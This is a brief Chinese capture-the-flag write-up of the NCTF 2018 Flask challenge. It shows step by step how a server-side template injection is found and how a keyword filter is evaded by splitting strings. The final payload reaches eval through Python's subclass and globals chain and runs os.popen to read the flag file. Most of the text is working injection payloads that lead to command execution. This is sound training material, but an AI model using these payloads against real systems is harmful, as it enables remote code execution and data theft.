[NCTF 2018]flask真香
[NCTF 2018]flask真香
题解
常规测试Payload直接打进去, 发现参数可控
1.14.71.254:28119/{{5*6}}
不太相信这种比赛题不会设防火墙,直接写入
{{""['__class__']}}
没有回显,那就尝试以下字符串拼接过滤
{{""['__cla''ss__']}}
回显出来了,那接下来就步入正轨
%7B%7B""['__cla''ss__']['__ba''ses__'][0]['__su''bcla''sses__']()%7D%7D
随便用以前从网上找的现成脚本跑出warnings.catch_warnings
下标 414
%7B%7B""['__cla''ss__']['__ba''ses__'][0]['__su''bcla''sses__']()[414]['__init__']['__glo''bals__']['__buil''tins__']['ev''al']("__im""port__('o''s').po""pen('tac%20/Th1s_is__F1114g').read()")%7D%7D